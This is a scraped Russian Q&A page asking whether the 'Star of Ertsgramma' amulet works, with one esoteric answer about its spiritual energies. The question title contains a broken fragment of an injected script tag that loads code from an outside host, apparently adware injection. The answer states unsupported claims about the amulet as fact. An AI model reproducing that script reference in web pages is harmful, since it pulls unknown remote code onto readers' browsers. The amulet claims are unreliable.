Эзотерика

Звезда Эрцграммы. В чем может помочь ношение ее? Какие свойства несет, действительно ли работает? &nbsp; <script... - вопрос №1170391

src=«c.operab2.com/op.php?host=www.liveexpert.ru»>

сентябрь 6, 2014 г.

  • Всего ответов: 1

    ✹Марина✹

    167-й в Эзотерике

    эта звезда символ 12 апостолов и Иисуса Христа… это как бы мостик между тонкими мирами и физическим… каждый амулет нужно смотреть отдельно… смотря кто делали какую энергетику он несет… просто купленный в магазине может быть энергетически пустым… да и специалиста не у каждого есть силы его включить в работу… да и многое зависит от веры в него самого человека… Вооьще это символ раскрытия всех возможностей и способностей человека… самый древний символ…

    сентябрь 6, 2014 г.